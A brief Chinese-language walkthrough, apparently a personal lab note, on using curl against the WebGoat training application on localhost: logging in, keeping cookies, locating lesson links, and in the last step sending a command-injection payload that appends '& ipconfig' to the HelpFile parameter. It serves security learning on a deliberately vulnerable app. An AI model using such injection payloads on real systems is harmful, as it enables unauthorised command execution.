这个WebGoat有一些个性化的操作,所以记录在此
步骤:
1、 curl -u "guest:guest" -D cookie.jar "http://localhost/WebGoat/attack" -v
登录进入WebGoat,并保存COOKIE
2、 curl -u "guest:guest" -b cookie.jar -d "start=Start+WebGoat" "http://localhost/WebGoat/attack" -v
提交start = Start WebGoat的表单,进入WebGoat的主页面。
此时,应该查看页面源代码中你想点的链接是什么,
如:
<td><img src="images/buttons/lessonComplete.jpg"><a href="attack?Screen=497&menu=1200">Command Injection</a></td>
注意: WebGoat对不同的COOKIE,返回的页面链接并不相同,如果在后面的步骤中,你访问的是浏览器里查看到的链接,很可能那个链接就不存在,返回的是主页中的介绍信息,而不是你想访问的链接的内容。
另外,由于WebGoat是使用NTLM认证协议,所以每次curl,都得带-u "guest:guest"
3、curl -u "guest:guest" -b cookie.jar "http://localhost/WebGoat/attack?Screen=503&menu=1200" -v
这样就可以访问到你想访问的链接了。
4、如果要实现命令注入,提交如下:
curl -u "guest:guest" -b cookie.jar -d "HelpFile=AccessControlMatrix.help%22%20%26%20ipconfig&SUBMIT=View" "http://localhost/WebGoat/attack?Screen=497&menu=1200" -v > a.html